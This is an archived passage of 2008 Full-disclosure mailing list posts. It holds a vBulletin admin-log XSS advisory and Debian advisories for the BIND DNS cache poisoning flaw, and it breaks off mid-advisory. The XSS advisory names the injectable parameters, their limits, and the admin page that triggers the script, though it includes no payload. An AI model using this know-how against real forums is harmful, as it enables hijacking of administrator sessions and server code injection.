2008 From: jessicasaulhope at googlemail.com (Jessica Hope) Date: Tue, 8 Jul 2008 17:59:06 +0100 Subject: [Full-disclosure] XSS in admin logs - vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower Message-ID: <44740eb60807080959g721452bdh4d326cf1cc1ab8fe@mail.gmail.com> ====================================================================== Advisory : XSS in admin logs Release Date : July 06th 2008 Application : vBulletin Version : vBulletin 3.7.2 and lower, vBulletin 3.6.10 PL2 and lower Platform : PHP Vendor URL : http://www.vbulletin.com/ Authors : Jessica Hope (jessicasaulhope at googlemail.com), Friends who wish to remain anonymous. ======================================================================= Overview Due to various failures in sanitising user input, it is possible to construct XSS attacks that are rather damaging. ======================================================================= Discussion The XSS in question exists on the log viewing page of the admin control panel. When a missing page is requested, a log is created in the admin area, however the inputs to this log lack sanitation. The script name is taken from basename(PHP_SELF), while the action is taken from _REQUEST['do']. Either one can be used for introducing XSS vectors. To highlight the severity and underline the fact that his vulnerability is exploitable: You then need to send the admin to adminlog.php?do=view&script=&u=0&pp=15&orderby=script&page=1 and the XSS will render. The limits on the XSS: basename(PHP_SELF) is 50 characters max and no slashes _REQUEST['do'] is limited to 20 characters, but no character restriction. The tight character limits on the unsanitized parameters are not mitigating the severity, as unlimited attack space can be obtained as shown above. As per my last exploits, all XSS in the vBulletin ACP can be used for PHP injection instantly. This is due to the design of the vBulletin hooks feature. As this particular XSS is persistent and will render in all major browsers it is particularly dangerous. ======================================================================= Solution: Update to vBulletin 3.7.2 PL1 or vBulletin 3.6.10 PL3 Don't trust PHP_SELF and sanitise all data that is going to be displayed to the user ======================================================================= From fw at deneb.enyo.de Tue Jul 8 18:03:12 2008 From: fw at deneb.enyo.de (Florian Weimer) Date: Tue, 08 Jul 2008 19:03:12 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1603-1] New bind9 packages fix cache poisoning Message-ID: <87vdzg48bz.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1603-1 security at debian.org http://www.debian.org/security/ Florian Weimer July 08, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : bind9 Vulnerability : DNS cache poisoning Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-1447 CERT advisory : VU#800113 Dan Kaminsky discovered that properties inherent to the DNS protocol lead to practical DNS cache poisoning attacks. Among other things, successful attacks can lead to misdirected web traffic and email rerouting. This update changes Debian's BIND 9 packages to implement the recommended countermeasure: UDP query source port randomization. This change increases the size of the space from which an attacker has to guess values in a backwards-compatible fashion and makes successful attacks significantly more difficult. Note that this security update changes BIND network behavior in a fundamental way, and the following steps are recommended to ensure a smooth upgrade. 1. Make sure that your network configuration is compatible with source port randomization. If you guard your resolver with a stateless packet filter, you may need to make sure that no non-DNS services listen on on the 1024--65535 UDP port range and open it at the packet filter. For instance, packet filters based on etch's Linux 2.6.18 kernel only support stateless filtering of IPv6 packets, and are therefore pose this additional difficulty. (If you use IPv4 with iptables and ESTABLISHED rules, networking changes are likely not required.) 2. Install the BIND 9 upgrade, using "apt-get update" followed by "apt-get install bind9". Verify that the named process has been restarted and answers recursive queries. (If all queries result in timeouts, this indicates that networking changes are necessary; see the first step.) 3. Verify that source port randomization is active. Check that the /var/log/daemon.log file does not contain messages of the following form named[6106]: /etc/bind/named.conf.options:28: using specific query-source port suppresses port randomization and can be insecure. right after the "listening on IPv6 interface" and "listening on IPv4 interface" messages logged by BIND upon startup. If these messages are present, you should remove the indicated lines from the configuration, or replace the port numbers contained within them with "*" sign (e.g., replace "port 53" with "port *"). For additional certainty, use tcpdump or some other network monitoring tool to check for varying UDP source ports. If there is a NAT device in front of your resolver, make sure that it does not defeat the effect of source port randomization. 4. If you cannot activate source port randomization, consider configuring BIND 9 to forward queries to a resolver which can, possibly over a VPN such as OpenVPN to create the necessary trusted network link. (Use BIND's forward-only mode in this case.) Other caching resolvers distributed by Debian (PowerDNS, MaraDNS, Unbound) already employ source port randomization, and no updated packages are needed. BIND 9.5 up to and including version 1:9.5.0.dfsg-4 only implements a weak form of source port randomization and needs to be updated as well. For information on BIND 8, see DSA-1604-1, and for the status of the libc stub resolver, see DSA-1605-1. The updated bind9 packages contain changes originally scheduled for the next stable point release, including the changed IP address of L.ROOT-SERVERS.NET (Debian bug #449148). For the stable distribution (etch), this problem has been fixed in version 9.3.4-2etch3. For the unstable distribution (sid), this problem will be fixed soon. We recommend that you upgrade your bind9 package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - ------------------------------- Debian (stable) - --------------- Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc. Source archives: http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3.dsc Size/MD5 checksum: 897 aeb15f8babb1e6e38367b9f19fea87da http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4.orig.tar.gz Size/MD5 checksum: 4043577 198181d47c58a0a9c0265862cd5557b0 http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3.diff.gz Size/MD5 checksum: 302126 521abea46b1104f2251cc398f30af303 Architecture independent packages: http://security.debian.org/pool/updates/main/b/bind9/bind9-doc_9.3.4-2etch3_all.deb Size/MD5 checksum: 189560 46ff778db82d2e171d292ecac93ea9b6 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_alpha.deb Size/MD5 checksum: 98154 bbdbcd3d0840f5ffcf4eaddf5a8c253f http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_alpha.deb Size/MD5 checksum: 1407380 ca8995875e76a25de6f32a47f62ea876 http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_alpha.deb Size/MD5 checksum: 226088 93100774ae6da891caf9fa27a2134cdf http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_alpha.deb Size/MD5 checksum: 112616 bca5dcca8abff15f4f9cc911f9f94818 http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_alpha.deb Size/MD5 checksum: 322286 677fdcf8e9a8c272a08ed47a79e09209 http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_alpha.deb Size/MD5 checksum: 190084 87d64554a1cdde9f58cc850f7d5961a1 http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_alpha.deb Size/MD5 checksum: 96508 48ba9fc0e884f093e95988bd4e088b9c http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_alpha.deb Size/MD5 checksum: 564862 7b23948d7c741d4f287698d28385ce71 http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_alpha.deb Size/MD5 checksum: 188742 5dd8024a9864137f4529785fcc9c9231 http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_alpha.deb Size/MD5 checksum: 116534 2e7dc9ea95bae40dc396ff504abb03bb http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_alpha.deb Size/MD5 checksum: 115784 b961fd6c797a2d1422ae588bfc25ed9d amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_amd64.deb Size/MD5 checksum: 224294 4d33744bb92300b061cad41dd8de7ea5 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_amd64.deb Size/MD5 checksum: 1111932 e43ced7eae496d7835247a068bef4a66 http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_amd64.deb Size/MD5 checksum: 190742 9e39ced5d3464594b9dda6ce683fc653 http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_amd64.deb Size/MD5 checksum: 319008 e36a35983ebc5061e8669ef7f004a851 http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_amd64.deb Size/MD5 checksum: 552414 c93c2863bddd5661010ae3472e210aa8 http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_amd64.deb Size/MD5 checksum: 95922 f114eb76add0d7dabad1d082d38ccf08 http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_amd64.deb Size/MD5 checksum: 117072 a70d1d96ea01aa24fb9642e09133824f http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_amd64.deb Size/MD5 checksum: 187646 70372cec3522356dcd00901ea64714d4 http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_amd64.deb Size/MD5 checksum: 111270 6dc6edfcca9fecb28c7e66d31ab14a74 http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_amd64.deb Size/MD5 checksum: 114722 905d0f9b7b5ebc0308c54158e71d03cc http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_amd64.deb Size/MD5 checksum: 96704 09d3c850f12a6c1f6eab4e800a118c87 arm architecture (ARM) http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_arm.deb Size/MD5 checksum: 107888 b2ea4933e233a1af8dd1e5ee641999a2 http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_arm.deb Size/MD5 checksum: 112714 27b1fde9b144cacb1ae06a441d7c5787 http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_arm.deb Size/MD5 checksum: 116076 cafc3294083de02518ab5fe0f0488c3b http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_arm.deb Size/MD5 checksum: 532206 a005bdff779fed950e4750231d0184b2 http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_arm.deb Size/MD5 checksum: 187364 72fdca60a20876be71b678028cefc316 http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_arm.deb Size/MD5 checksum: 95752 bce98b259a2821d59f6e6b441b491d77 http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_arm.deb Size/MD5 checksum: 182950 26a15d51a4e6f1ea1dda99ab4d3ea34c http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_arm.deb Size/MD5 checksum: 217686 97f538e27ab7c765b514a9ce59869a41 http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_arm.deb Size/MD5 checksum: 95168 374d7f18915fc8eb6b775d272cf28f2e http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_arm.deb Size/MD5 checksum: 1074498 fdada51888027e9c3e89961b31a48ded http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_arm.deb Size/MD5 checksum: 311078 43d1c044b0cc81b072b8962ad3b8f019 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_hppa.deb Size/MD5 checksum: 96986 bba6d0a611b7088e284564b430f91405 http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_hppa.deb Size/MD5 checksum: 97140 14f3dacd102208700660873637dea18b http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_hppa.deb Size/MD5 checksum: 185570 012eb78b091c0991988a95160df7d65d http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_hppa.deb Size/MD5 checksum: 115822 d717418b7ec770e5419e0941670eab19 http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_hppa.deb Size/MD5 checksum: 543342 201331119c074430d503b68dc210e187 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_hppa.deb Size/MD5 checksum: 1258146 2f092d0708338d0a3ac8924218fee0d7 http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_hppa.deb Size/MD5 checksum: 315070 bc8d94bec7b1c8cf80f64fb72d1f38e5 http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_hppa.deb Size/MD5 checksum: 187942 1cd85afac13850d1807a5b50b9d3262f http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_hppa.deb Size/MD5 checksum: 114612 912dc2007ca7cb6097a3e6a4e98897e3 http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_hppa.deb Size/MD5 checksum: 217378 49276452262a155ba17db2ad8c66e3e2 http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_hppa.deb Size/MD5 checksum: 113466 428d268ce8ad5386c1af758ca4cff2ce i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_i386.deb Size/MD5 checksum: 106034 ce4d4a024472317185d4c6492b7d30df http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_i386.deb Size/MD5 checksum: 180292 1fd02a86a31b68a8db2407904495a0db http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_i386.deb Size/MD5 checksum: 94838 9dbc2734dd8b8bb7c3e7684faabea64e http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_i386.deb Size/MD5 checksum: 206330 a22fb6cb47d6e449007d665b9e6d8c52 http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_i386.deb Size/MD5 checksum: 113162 b9bc5fa7f96313235a53ab6fd819b58b http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_i386.deb Size/MD5 checksum: 472708 9edfb07c186a93aea1a2e602e0ee6335 http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_i386.deb Size/MD5 checksum: 94822 d2fc00416dc090a535b280f48eee7f46 http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_i386.deb Size/MD5 checksum: 169930 47c43c9738afb7ed72618930dc702ed3 http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_i386.deb Size/MD5 checksum: 296722 dd1979969210386fc36d119e19e12cc2 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_i386.deb Size/MD5 checksum: 996528 56db22ee21e053443e72ccd11a25181b http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_i386.deb Size/MD5 checksum: 110134 5491e4e33e43f1300840b62947690b7a ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 232052 eb9215cb2ba71ded815b4ca6f0ac0744 http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 99978 ceee4c1dc16fdf2d7fefe1aee6d8dd85 http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 393324 553b67ca638482db8e1586d231f03abe http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 740264 a30c98b25296a147d47d7f44c8418883 http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 127606 33d62368c2ce437e660708eb6b0ffe2b http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 216344 0a0b33f34dbeb744bd8af8ad8388048f http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 125806 3aafce71b9e4ecaf01602c409a355b54 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 1584302 d982b4443c38056cdeb80b327ee36f3a http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 117782 ae8ae735a8054ff473d305b06c90c68a http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 102432 4443f6e43cc1e4c7448965a0501bfe54 http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_ia64.deb Size/MD5 checksum: 280866 c20244c3a06177b934ac804b382b85c7 mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_mips.deb Size/MD5 checksum: 174012 cf61e15aa7c79b40ae94a3c1d08ba496 http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_mips.deb Size/MD5 checksum: 301476 4094fd919da162322ea07d62378cc664 http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_mips.deb Size/MD5 checksum: 110326 be73e626902012ca986d4192804017e7 http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_mips.deb Size/MD5 checksum: 180490 dde7f37a0a2456190461f5f26bf30ab6 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_mips.deb Size/MD5 checksum: 1229398 37af92bf5074d9a260fd4ff5346dc4b8 http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_mips.deb Size/MD5 checksum: 211386 8083484e19ebc9099022954350c6baf7 http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_mips.deb Size/MD5 checksum: 94992 46f858e2ed33a864539476d25bd9b44f http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_mips.deb Size/MD5 checksum: 94230 6bfa6b8d78c46567a341f6174f9aa874 http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_mips.deb Size/MD5 checksum: 491862 fc2d747a29c0116da5936b4964ef8146 http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_mips.deb Size/MD5 checksum: 113268 58fb17d2ee0415e13fdad4727534b6cc http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_mips.deb Size/MD5 checksum: 107912 5834642a56bb9548510f8cd0a3ae766f mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 299514 0b5de102f7ddf83d497498b320613556 http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 488260 7b85b99ea5c24f74e531bbd9056672e9 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 1205384 a3211957988d4aaae40776ff41cf6a01 http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 113016 dddd0a37c778cd68696318a7adc1abcd http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 110254 6754bc57fcac807b5569531f7e821802 http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 174148 23e91bbb42a44ca80535079660813277 http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 179630 fa26c51aa248cb502ac54544bdd6ced0 http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 210904 21784fc7019a384e78ecc94a10f4e315 http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 94936 2068abe2f2e78675ad94ea28579efc87 http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 107166 2cfce41a4fc41aa9986cdef01e09705d http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_mipsel.deb Size/MD5 checksum: 94098 c95a157cfa3feef62450afdef3fe65a8 powerpc architecture (PowerPC) http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 173606 9618a781d59f94f751e18db86cf6b948 http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 112276 e786724068250eb53c475a3e51035d51 http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 113842 4961da1e75c17f3f00621acfc06d10fe http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 488428 b777fc3fe13b319817f955f116b40e83 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 1167832 75f402f7bf328da5deee364f4266558d http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 96204 57ec688c7f24161e347054dc93fbd757 http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 96170 77d5b9189a05f2b3dca7901bff6e56df http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 301276 dddf71278c1f4afbbc49019248f4328e http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 109288 8fd2b3005fcf95e3616ec8a77b3ad322 http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 183310 b9eb85b58aaf29a3106d16410c0d379a http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_powerpc.deb Size/MD5 checksum: 206830 b286690dde8d1412c2de3fa99f7d3c5b s390 architecture (IBM S/390) http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_s390.deb Size/MD5 checksum: 114234 23a30b0e26db0210a1be48c4d44b6d7f http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_s390.deb Size/MD5 checksum: 331864 7c3fab929f1e29873ecfc7c7c4b52ddc http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_s390.deb Size/MD5 checksum: 116656 8abeeeb22e800f63e4b30e0c2dd974e0 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_s390.deb Size/MD5 checksum: 1137342 820a17acdc24ef1dd0c1db7b8e6fc470 http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_s390.deb Size/MD5 checksum: 233948 635487d4e6ea4d15704bb14b8cf9236c http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_s390.deb Size/MD5 checksum: 196598 2198086ee8c358aa3ed5046708a31f45 http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_s390.deb Size/MD5 checksum: 194704 c897d956b11161ae8e31e4bffb489883 http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_s390.deb Size/MD5 checksum: 118140 e5e11d59852a32dcd1b78b4aabd22fff http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_s390.deb Size/MD5 checksum: 95664 050d558c3d06e520fb4e6c6cebd520c3 http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_s390.deb Size/MD5 checksum: 579484 6fc80f5cde0c2d01b49ae53f027eeecc http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_s390.deb Size/MD5 checksum: 97786 5dda64259aa80e1c2e085e7fc2430299 sparc architecture (Sun SPARC/UltraSPARC) http://security.debian.org/pool/updates/main/b/bind9/bind9_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 300090 21095a9477d8db8bdbca300235ddc296 http://security.debian.org/pool/updates/main/b/bind9/lwresd_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 210606 8bd074b427b5f732c5584ca265bb2c28 http://security.debian.org/pool/updates/main/b/bind9/libbind-dev_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 1121664 2750abf3a8e3ffa54d1b15f6a5b6738e http://security.debian.org/pool/updates/main/b/bind9/libisccc0_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 94822 4e2634cf2561a237174a6863377b24cd http://security.debian.org/pool/updates/main/b/bind9/libisc11_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 175248 4231a2791083fc82977535613d38ef2a http://security.debian.org/pool/updates/main/b/bind9/dnsutils_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 184036 aea98952994fb97c74df02ae4ed2f28d http://security.debian.org/pool/updates/main/b/bind9/libisccfg1_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 107574 b6a3a3204c134d54dce2d8d79f77f647 http://security.debian.org/pool/updates/main/b/bind9/libdns22_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 493628 b5c5a9638091fd0d6543a405bfdefd53 http://security.debian.org/pool/updates/main/b/bind9/libbind9-0_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 94828 4657a6a42f7f2fac5ef96d273e9de4df http://security.debian.org/pool/updates/main/b/bind9/bind9-host_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 114258 32f88744a6e6e648377dda42ff910cbb http://security.debian.org/pool/updates/main/b/bind9/liblwres9_9.3.4-2etch3_sparc.deb Size/MD5 checksum: 111158 a59dbf1edb5518b09b2993049922c01a These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBSHOID797/wQC1SS+AQLt/ggAjgiVFP8JkM02lokQLFu0LG7DwPfZUINz 3cn771JAPpFqeyW1UjuArHQlfhiiQ6Baxv2iCsF/TBabhqLggCRYjc+92d/0oQkh qoqCqk475kC8Y3I0lrG+9l2hRqxrW4XRpY/O45rgxQ569ZrAm5i5zZFbx9cNpfrP HP3KQ+hnQeLD9ci9kemgwFCI9w7PCCx3ns8ZqfNigEt6iiEqO5vrHOStfQNs96K0 wmmkyfKRGBuJIIXv+8vhxAcsqOmgyHpN0C+soUlsVSXmje2kpEljATvCBj/LRYXs WueLQPQvx1kH/4mbJyXvAFNpAjF6HN5iW66nkXT96udtI1YbjTP4Tg== =AJo4 -----END PGP SIGNATURE----- From fw at deneb.enyo.de Tue Jul 8 18:03:55 2008 From: fw at deneb.enyo.de (Florian Weimer) Date: Tue, 08 Jul 2008 19:03:55 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1604-1] BIND 8 deprecation notice Message-ID: <87r6a448as.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1604-1 security at debian.org http://www.debian.org/security/ Florian Weimer July 08, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : bind Vulnerability : DNS cache poisoning Problem type : remote Debian-specific: no CVE Id(s) : CVE-2008-1447 CERT advisory : VU#800113 Dan Kaminsky discovered that properties inherent to the DNS protocol lead to practical DNS cache poisoning attacks. Among other things, successful attacks can lead to misdirected web traffic and email rerouting. The BIND 8 legacy code base could not be updated to include the recommended countermeasure (source port randomization, see DSA-1603-1 for details). There are two ways to deal with this situation: 1. Upgrade to BIND 9 (or another implementation with source port randomization). The documentation included with BIND 9 contains a migration guide. 2. Configure the BIND 8 resolver to forward queries to a BIND 9 resolver. Provided that the network between both resolvers is trusted, this protects the BIND 8 resolver from cache poisoning attacks (to the same degree that the BIND 9 resolver is protected). This problem does not apply to BIND 8 when used exclusively as an authoritative DNS server. It is theoretically possible to safely use BIND 8 in this way, but updating to BIND 9 is strongly recommended. BIND 8 (that is, the bind package) will be removed from the etch distribution in a future point release. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBSHOIFL97/wQC1SS+AQLZYAgAhiucKuHSkgZRjm1E9vUS4t9VmVhKdYB2 jDhG00WloZPxeBjHT0Ar1b4S/QGbDQ2Dy2hlMONsl5ZZWAbkzzANDsVIDC2xez5w NBqJjfEKYuk7Q3E+elyJ/z79F0HbMtO+SdagRoSbIV3nWfSoRI6jp+32Be69JazW Te3gLKOAm6TpdYPpn7wmw2pXeOKzeUaOh/npXAYH4YEKmqnxzJZy+0862kaKSQ8G 9qGIQ9zKCkPLs4bKt+JhpwWumfgaabGT6KlGAtC3ORBef54Ux/EdpNFEGBWvWrxU HOcPZGBJKxUAO4doJdRPNcFV4ez4u2v0WFK3bRM+JNgegnoplvnxuA== =vK+3 -----END PGP SIGNATURE----- From fw at deneb.enyo.de Tue Jul 8 18:05:29 2008 From: fw at deneb.enyo.de (Florian Weimer) Date: Tue, 08 Jul 2008 19:05:29 +0200 Subject: [Full-disclosure] [SECURITY] [DSA 1605-1] DNS vulnerability impact on the libc stub resolver Message-ID: <87myks4886.fsf@mid.deneb.enyo.de> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1605-1 security at 